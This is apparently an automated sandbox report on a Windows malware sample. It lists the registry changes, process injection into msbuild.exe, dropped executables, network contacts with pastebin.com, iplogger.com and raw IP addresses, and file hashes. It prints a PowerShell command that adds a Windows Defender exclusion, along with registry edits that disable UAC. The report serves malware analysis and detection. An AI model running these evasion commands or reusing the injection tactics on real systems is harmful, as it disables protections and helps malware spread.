Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe = "0" C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2108 set thread context of 436 N/A C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u3tg.1.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u3tg.1.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u3tg.1.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\3p4RlKZEdhcS5NCHU2f3WuyU.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\3p4RlKZEdhcS5NCHU2f3WuyU.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2108 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2108 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2108 wrote to memory of 436 N/A C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 2108 wrote to memory of 436 N/A C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 2108 wrote to memory of 436 N/A C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 2108 wrote to memory of 436 N/A C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 2108 wrote to memory of 436 N/A C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 2108 wrote to memory of 436 N/A C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 2108 wrote to memory of 436 N/A C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 2108 wrote to memory of 436 N/A C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 436 wrote to memory of 4948 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\sbL18U8mj7OfoNwCqPxqbUrY.exe
PID 436 wrote to memory of 4948 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\sbL18U8mj7OfoNwCqPxqbUrY.exe
PID 436 wrote to memory of 4948 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\sbL18U8mj7OfoNwCqPxqbUrY.exe
PID 436 wrote to memory of 2424 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\RVOVCUia30HvQp3cKIR8itTN.exe
PID 436 wrote to memory of 2424 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\RVOVCUia30HvQp3cKIR8itTN.exe
PID 436 wrote to memory of 2424 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\RVOVCUia30HvQp3cKIR8itTN.exe
PID 436 wrote to memory of 4108 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\3p4RlKZEdhcS5NCHU2f3WuyU.exe
PID 436 wrote to memory of 4108 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\3p4RlKZEdhcS5NCHU2f3WuyU.exe
PID 436 wrote to memory of 4108 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\3p4RlKZEdhcS5NCHU2f3WuyU.exe
PID 436 wrote to memory of 4840 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\Sltw7XOjjA8XyWkuXpICJyEr.exe
PID 436 wrote to memory of 4840 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\Sltw7XOjjA8XyWkuXpICJyEr.exe
PID 436 wrote to memory of 4840 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\Sltw7XOjjA8XyWkuXpICJyEr.exe
PID 436 wrote to memory of 1816 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\iDuQFJcVUtwiIAfFZfcZ0wYH.exe
PID 436 wrote to memory of 1816 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\iDuQFJcVUtwiIAfFZfcZ0wYH.exe
PID 436 wrote to memory of 1816 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\iDuQFJcVUtwiIAfFZfcZ0wYH.exe
PID 4108 wrote to memory of 1424 N/A C:\Users\Admin\Pictures\3p4RlKZEdhcS5NCHU2f3WuyU.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4108 wrote to memory of 1424 N/A C:\Users\Admin\Pictures\3p4RlKZEdhcS5NCHU2f3WuyU.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4108 wrote to memory of 1424 N/A C:\Users\Admin\Pictures\3p4RlKZEdhcS5NCHU2f3WuyU.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2424 wrote to memory of 3440 N/A C:\Users\Admin\Pictures\RVOVCUia30HvQp3cKIR8itTN.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2424 wrote to memory of 3440 N/A C:\Users\Admin\Pictures\RVOVCUia30HvQp3cKIR8itTN.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2424 wrote to memory of 3440 N/A C:\Users\Admin\Pictures\RVOVCUia30HvQp3cKIR8itTN.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4840 wrote to memory of 2112 N/A C:\Users\Admin\Pictures\Sltw7XOjjA8XyWkuXpICJyEr.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4840 wrote to memory of 2112 N/A C:\Users\Admin\Pictures\Sltw7XOjjA8XyWkuXpICJyEr.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4840 wrote to memory of 2112 N/A C:\Users\Admin\Pictures\Sltw7XOjjA8XyWkuXpICJyEr.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1816 wrote to memory of 228 N/A C:\Users\Admin\Pictures\iDuQFJcVUtwiIAfFZfcZ0wYH.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1816 wrote to memory of 228 N/A C:\Users\Admin\Pictures\iDuQFJcVUtwiIAfFZfcZ0wYH.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1816 wrote to memory of 228 N/A C:\Users\Admin\Pictures\iDuQFJcVUtwiIAfFZfcZ0wYH.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4948 wrote to memory of 4676 N/A C:\Users\Admin\Pictures\sbL18U8mj7OfoNwCqPxqbUrY.exe C:\Users\Admin\AppData\Local\Temp\u3tg.0.exe
PID 4948 wrote to memory of 4676 N/A C:\Users\Admin\Pictures\sbL18U8mj7OfoNwCqPxqbUrY.exe C:\Users\Admin\AppData\Local\Temp\u3tg.0.exe
PID 4948 wrote to memory of 4676 N/A C:\Users\Admin\Pictures\sbL18U8mj7OfoNwCqPxqbUrY.exe C:\Users\Admin\AppData\Local\Temp\u3tg.0.exe
PID 4948 wrote to memory of 2692 N/A C:\Users\Admin\Pictures\sbL18U8mj7OfoNwCqPxqbUrY.exe C:\Users\Admin\AppData\Local\Temp\u3tg.1.exe
PID 4948 wrote to memory of 2692 N/A C:\Users\Admin\Pictures\sbL18U8mj7OfoNwCqPxqbUrY.exe C:\Users\Admin\AppData\Local\Temp\u3tg.1.exe
PID 4948 wrote to memory of 2692 N/A C:\Users\Admin\Pictures\sbL18U8mj7OfoNwCqPxqbUrY.exe C:\Users\Admin\AppData\Local\Temp\u3tg.1.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe

"C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"

C:\Users\Admin\Pictures\sbL18U8mj7OfoNwCqPxqbUrY.exe

"C:\Users\Admin\Pictures\sbL18U8mj7OfoNwCqPxqbUrY.exe"

C:\Users\Admin\Pictures\RVOVCUia30HvQp3cKIR8itTN.exe

"C:\Users\Admin\Pictures\RVOVCUia30HvQp3cKIR8itTN.exe"

C:\Users\Admin\Pictures\3p4RlKZEdhcS5NCHU2f3WuyU.exe

"C:\Users\Admin\Pictures\3p4RlKZEdhcS5NCHU2f3WuyU.exe"

C:\Users\Admin\Pictures\Sltw7XOjjA8XyWkuXpICJyEr.exe

"C:\Users\Admin\Pictures\Sltw7XOjjA8XyWkuXpICJyEr.exe"

C:\Users\Admin\Pictures\iDuQFJcVUtwiIAfFZfcZ0wYH.exe

"C:\Users\Admin\Pictures\iDuQFJcVUtwiIAfFZfcZ0wYH.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\u3tg.0.exe

"C:\Users\Admin\AppData\Local\Temp\u3tg.0.exe"

C:\Users\Admin\AppData\Local\Temp\u3tg.1.exe

"C:\Users\Admin\AppData\Local\Temp\u3tg.1.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4948 -ip 4948

C:\Users\Admin\Pictures\3p4RlKZEdhcS5NCHU2f3WuyU.exe

"C:\Users\Admin\Pictures\3p4RlKZEdhcS5NCHU2f3WuyU.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4948 -s 1424

C:\Users\Admin\Pictures\RVOVCUia30HvQp3cKIR8itTN.exe

"C:\Users\Admin\Pictures\RVOVCUia30HvQp3cKIR8itTN.exe"

C:\Users\Admin\Pictures\Sltw7XOjjA8XyWkuXpICJyEr.exe

"C:\Users\Admin\Pictures\Sltw7XOjjA8XyWkuXpICJyEr.exe"

C:\Users\Admin\Pictures\iDuQFJcVUtwiIAfFZfcZ0wYH.exe

"C:\Users\Admin\Pictures\iDuQFJcVUtwiIAfFZfcZ0wYH.exe"

C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1

Network

Country Destination Domain Proto
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 79.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 onlycitylink.com udp
DE 185.172.128.59:80 185.172.128.59 tcp
RU 193.233.132.234:80 tcp
US 8.8.8.8:53 realdeepai.org udp
RU 193.233.132.234:80 tcp
US 8.8.8.8:53 yip.su udp
US 8.8.8.8:53 nic-it.nl udp
US 172.67.193.79:443 realdeepai.org tcp
US 172.67.193.79:443 realdeepai.org tcp
US 104.21.18.166:443 onlycitylink.com tcp
US 104.21.18.166:443 onlycitylink.com tcp
US 104.21.79.77:443 yip.su tcp
DE 138.201.79.103:80 nic-it.nl tcp
US 8.8.8.8:53 firstfirecar.com udp
US 8.8.8.8:53 jonathantwo.com udp
US 172.67.193.220:443 firstfirecar.com tcp
US 172.67.193.220:443 firstfirecar.com tcp
US 8.8.8.8:53 24.19.67.172.in-addr.arpa udp
US 8.8.8.8:53 59.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 79.193.67.172.in-addr.arpa udp
US 8.8.8.8:53 166.18.21.104.in-addr.arpa udp
US 8.8.8.8:53 77.79.21.104.in-addr.arpa udp
US 8.8.8.8:53 103.79.201.138.in-addr.arpa udp
US 172.67.176.131:443 jonathantwo.com tcp
US 172.67.176.131:443 jonathantwo.com tcp
US 8.8.8.8:53 220.193.67.172.in-addr.arpa udp
US 8.8.8.8:53 131.176.67.172.in-addr.arpa udp
US 8.8.8.8:53 iplogger.com udp
US 104.21.76.57:443 iplogger.com tcp
US 8.8.8.8:53 57.76.21.104.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 99.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 142.53.16.96.in-addr.arpa udp
US 8.8.8.8:53 101.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 77.190.18.2.in-addr.arpa udp
DE 185.172.128.90:80 185.172.128.90 tcp
US 8.8.8.8:53 90.128.172.185.in-addr.arpa udp
DE 185.172.128.228:80 185.172.128.228 tcp
DE 185.172.128.59:80 185.172.128.59 tcp
DE 185.172.128.228:80 185.172.128.228 tcp
US 8.8.8.8:53 228.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 svc.iolo.com udp
US 20.157.87.45:80 svc.iolo.com tcp
US 8.8.8.8:53 45.87.157.20.in-addr.arpa udp
US 8.8.8.8:53 download.iolo.net udp
FR 143.244.56.49:443 download.iolo.net tcp
US 8.8.8.8:53 49.56.244.143.in-addr.arpa udp
US 20.157.87.45:80 svc.iolo.com tcp

Files

memory/2108-0-0x00007FFAE5E73000-0x00007FFAE5E75000-memory.dmp

memory/2108-1-0x0000024CC3460000-0x0000024CC346A000-memory.dmp

memory/2108-2-0x0000024CDD8D0000-0x0000024CDD92E000-memory.dmp

memory/2108-3-0x00007FFAE5E70000-0x00007FFAE6931000-memory.dmp

memory/436-4-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2552-5-0x00007FFAE5E70000-0x00007FFAE6931000-memory.dmp

memory/2552-11-0x000002670B610000-0x000002670B632000-memory.dmp

memory/2552-15-0x00007FFAE5E70000-0x00007FFAE6931000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rhx5y2uc.abm.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/436-18-0x0000000074FCE000-0x0000000074FCF000-memory.dmp

memory/2552-17-0x00007FFAE5E70000-0x00007FFAE6931000-memory.dmp

C:\Users\Admin\Pictures\f2jIAYhVuI49QkFtRFqaO9KE.exe

MD5 949f191270e024e75823b32174f15754
SHA1 e2685aee44aaee2bc87888ee7c86d77bba313eae
SHA256 c3356a89f9d9962232df6a5d6dbfb42a9e2b2578b2a8d89c20b61c4c2e72c71c
SHA512 d3eea70b18938ab93b4d659a0dcb793ab1f440614763b005c9e3f9bf36e4ad49c87cd9d436d2821c34c194a6ec384c57351be4bf9164caaf269046d29c01a55a

C:\Users\Admin\Pictures\sbL18U8mj7OfoNwCqPxqbUrY.exe

MD5 0548c8fb97a0beb199aafecc2be8acb4
SHA1 d694cdfe61f922c4433d0549e5ff31e1c490bcab
SHA256 283a84dafeb6ce11cce61dcb92acc91f1d284aea06bf4b71024cfd1ad4f9ff46
SHA512 aa36040a2f815f2eeb65041d6a3cd3acd7c62d17f1432ae87269fbdf6162b9d72f695d86af1aba8d1223080b4b8d7deea25b423d73e5b4219bcd8111ce029cbe

C:\Users\Admin\Pictures\XcX6Z1cO9MLjIJMBclQuIu2Z.exe

MD5 77f762f953163d7639dff697104e1470
SHA1 ade9fff9ffc2d587d50c636c28e4cd8dd99548d3
SHA256 d9e15bb8027ff52d6d8d4e294c0d690f4bbf9ef3abc6001f69dcf08896fbd4ea
SHA512 d9041d02aaca5f06a0f82111486df1d58df3be7f42778c127ccc53b2e1804c57b42b263cc607d70e5240518280c7078e066c07dec2ea32ec13fb86aa0d4cb499

memory/2552-53-0x00007FFAE5E70000-0x00007FFAE6931000-memory.dmp

memory/2108-54-0x00007FFAE5E70000-0x00007FFAE6931000-memory.dmp

C:\Users\Admin\Pictures\RVOVCUia30HvQp3cKIR8itTN.exe

MD5 cae69d5c81409ec9162f8bd1b07533f7
SHA1 9aea0a70c0fc3b60df129f9c3d5a42a0eaafae68
SHA256 be5f5f4dc0731d21d0193287437c41a21ca8981d7970beaeecceaf3962568aab
SHA512 34977a5194cbf947deb5e0705baad4d20fd06c600580736269de96ef1ab0e5f6f6b8f3d9d8203999d926ef1c337d28f08aa92af4f86df7201714fbf5b137de69

C:\Users\Admin\Pictures\3p4RlKZEdhcS5NCHU2f3WuyU.exe

MD5 7341c4e85f4d8f7c00616b3fbbb73204
SHA1 b164950d93fd0b5fa51a6796c9cf79051a90e2cc
SHA256 12cb93fa727511eecd5a7721b71eae16305bb700a748be745bbce4ab6e65be4b
SHA512 83b519c34a9e52f526755d91fe0ff19716d1fedb9552f1e8da66ba59b45782bb173b8f926dff2e5cf0681fb6cfda485823f6aee190bc0ec804008059849e7f1d

memory/436-100-0x0000000074FCE000-0x0000000074FCF000-memory.dmp

memory/1424-101-0x0000000002BE0000-0x0000000002C16000-memory.dmp

memory/1424-102-0x00000000053F0000-0x0000000005A18000-memory.dmp

memory/1424-105-0x00000000051D0000-0x0000000005236000-memory.dmp

memory/1424-104-0x0000000005160000-0x00000000051C6000-memory.dmp

memory/1424-103-0x00000000050C0000-0x00000000050E2000-memory.dmp

memory/1424-111-0x0000000005B80000-0x0000000005ED4000-memory.dmp

memory/1424-116-0x0000000006190000-0x00000000061AE000-memory.dmp

memory/1424-117-0x00000000061D0000-0x000000000621C000-memory.dmp

memory/1424-118-0x0000000007320000-0x0000000007364000-memory.dmp

memory/1424-120-0x00000000074C0000-0x0000000007536000-memory.dmp

memory/4108-119-0x0000000000400000-0x0000000002958000-memory.dmp

memory/1424-122-0x0000000007560000-0x000000000757A000-memory.dmp

memory/1424-121-0x0000000007BC0000-0x000000000823A000-memory.dmp

memory/1424-124-0x000000006FCD0000-0x000000006FD1C000-memory.dmp

memory/1424-125-0x000000006FEA0000-0x00000000701F4000-memory.dmp

memory/1424-136-0x0000000007780000-0x0000000007823000-memory.dmp

memory/1424-135-0x0000000007760000-0x000000000777E000-memory.dmp

memory/1424-137-0x0000000007860000-0x000000000786A000-memory.dmp

memory/1424-123-0x0000000007720000-0x0000000007752000-memory.dmp

memory/1424-138-0x0000000007920000-0x00000000079B6000-memory.dmp

memory/1424-139-0x0000000007880000-0x0000000007891000-memory.dmp

memory/1424-140-0x00000000078C0000-0x00000000078CE000-memory.dmp

memory/1424-141-0x00000000078D0000-0x00000000078E4000-memory.dmp

memory/1424-142-0x00000000079C0000-0x00000000079DA000-memory.dmp

memory/1424-143-0x0000000007900000-0x0000000007908000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\u3tg.0.exe

MD5 adaa7779ccd1879d9466706724ca2974
SHA1 af546b538b5362ee19131e8d30b633c817417d15
SHA256 7109bdc186a84c29affbe2882b747b8c32587ce4e8d4b39e770faa06d94431d8
SHA512 96fa1c074b4f268393f17b400711898178ce8479272d5b6ca1405568dbe63cc618b46bfb5b80a8b97a7a796f6d4b60c3727beb2b2a13d7e749b3746b736bff87

memory/3440-179-0x000000006FCD0000-0x000000006FD1C000-memory.dmp

memory/3440-191-0x000000006FEA0000-0x00000000701F4000-memory.dmp

memory/228-180-0x000000006FCD0000-0x000000006FD1C000-memory.dmp

memory/228-181-0x000000006FEA0000-0x00000000701F4000-memory.dmp

memory/2112-202-0x000000006FEA0000-0x00000000701F4000-memory.dmp

memory/2112-201-0x000000006FCD0000-0x000000006FD1C000-memory.dmp

memory/4948-214-0x0000000000400000-0x0000000002599000-memory.dmp

memory/2424-215-0x0000000000400000-0x0000000002958000-memory.dmp

memory/4840-218-0x0000000000400000-0x0000000002958000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\u3tg.1.exe

MD5 397926927bca55be4a77839b1c44de6e
SHA1 e10f3434ef3021c399dbba047832f02b3c898dbd
SHA256 4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7
SHA512 cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954

memory/4108-216-0x0000000000400000-0x0000000002958000-memory.dmp

memory/228-234-0x0000000007AF0000-0x0000000007B04000-memory.dmp

memory/4108-233-0x0000000000400000-0x0000000002958000-memory.dmp

memory/4948-240-0x0000000000400000-0x0000000002599000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 a6ea7bfcd3aac150c0caef765cb52281
SHA1 037dc22c46a0eb0b9ad4c74088129e387cffe96b
SHA256 f019af2e5e74cdf13c963910500f9436c66b6f2901f5056d72f82310f20113b9
SHA512 c8d2d373b48a26cf6eec1f5cfc05819011a3fc49d863820ad07b6442dd6d5f64e27022a9e4c381eb58bf7f6b19f8e77d508734ff803073ec2fb32da9081b6f23

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 8526a6e3cf997c11fd91830a7cb77518
SHA1 d42746b1cdcf1ace37537f5e1a8f827ebb06f07c
SHA256 3a5237e4a0a905ff0cb607ee51fdb62cd20b687906d180ebab6060c68e37eb88
SHA512 72078680e1982f003f1503a0d5fb497aa045b07d32504a46b8b7d56d7e888b6f2ecd5ac3209d66a5bde29d7ab1b8de939ea28fadcb544bea8f610043d35e5703

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 0ecff8b5e01fc7ade8c4a374ad4d214d
SHA1 639fc600d0b3ddad57c6d10c29a3eabd43096ae0
SHA256 e546870e6c2f8e823627056bcd91b1a815b09ab66f8086685dbb135df7a62971
SHA512 620c7b66657c3919fc3330fa9322e2ee3a38a4e7d8841ab1b7c0aae0dfece90b91cc713cb72ed56cdff447b4fe9ffa6acdf3857b14b373f9ac197ebe53937ce0

memory/2424-249-0x0000000000400000-0x0000000002958000-memory.dmp

memory/1816-253-0x0000000000400000-0x0000000002958000-memory.dmp

memory/4840-252-0x0000000000400000-0x0000000002958000-memory.dmp

memory/2692-255-0x0000000000400000-0x00000000008AD000-memory.dmp

memory/2692-275-0x0000000000400000-0x00000000008AD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

MD5 1850e0a8721662b8535c6292d14ad5b9
SHA1 b4f76a3e32c24a09280652cde3b03c76993a7f34
SHA256 8efa5b920028e5731cda4632e8f0f6dbdb36312b3112ca4e7abfe817d1a330d2
SHA512 8b28902bf52b0e78d27cba9fb2582309b21e662a697ad6e2e99e7d1d8fa10e646bdea1482a664cef17db2ad31f5cab197b460946784d7375e22661c95812ec9a

memory/2692-287-0x0000000000400000-0x00000000008AD000-memory.dmp

memory/2692-288-0x0000000000400000-0x00000000008AD000-memory.dmp

memory/3840-289-0x0000022E08AF0000-0x0000022E0C324000-memory.dmp

memory/3840-290-0x0000022E28300000-0x0000022E2840A000-memory.dmp

memory/3840-292-0x0000022E0E1D0000-0x0000022E0E1DC000-memory.dmp

memory/3840-291-0x0000022E0E1B0000-0x0000022E0E1C0000-memory.dmp

memory/3840-293-0x0000022E0E1C0000-0x0000022E0E1D4000-memory.dmp

memory/3840-294-0x0000022E0E250000-0x0000022E0E274000-memory.dmp

memory/3840-295-0x0000022E0E050000-0x0000022E0E05A000-memory.dmp

memory/3840-296-0x0000022E28150000-0x0000022E2817A000-memory.dmp

memory/3840-298-0x0000022E28600000-0x0000022E28650000-memory.dmp

memory/3840-297-0x0000022E28550000-0x0000022E28602000-memory.dmp

memory/3840-299-0x0000022E0E060000-0x0000022E0E06A000-memory.dmp

memory/3840-303-0x0000022E28650000-0x0000022E28950000-memory.dmp

memory/3840-305-0x0000022E2C2E0000-0x0000022E2C2E8000-memory.dmp

memory/3840-307-0x0000022E2C9B0000-0x0000022E2C9BE000-memory.dmp

memory/3840-306-0x0000022E2C9F0000-0x0000022E2CA28000-memory.dmp

memory/3840-308-0x0000022E2C9D0000-0x0000022E2C9D8000-memory.dmp

memory/3840-311-0x0000022E2DBC0000-0x0000022E2DBE2000-memory.dmp

memory/3840-310-0x0000022E2DB60000-0x0000022E2DBC2000-memory.dmp

memory/3840-309-0x0000022E2DB40000-0x0000022E2DB4A000-memory.dmp

memory/3840-312-0x0000022E2E110000-0x0000022E2E638000-memory.dmp

memory/3840-315-0x0000022E2D8C0000-0x0000022E2D8CC000-memory.dmp

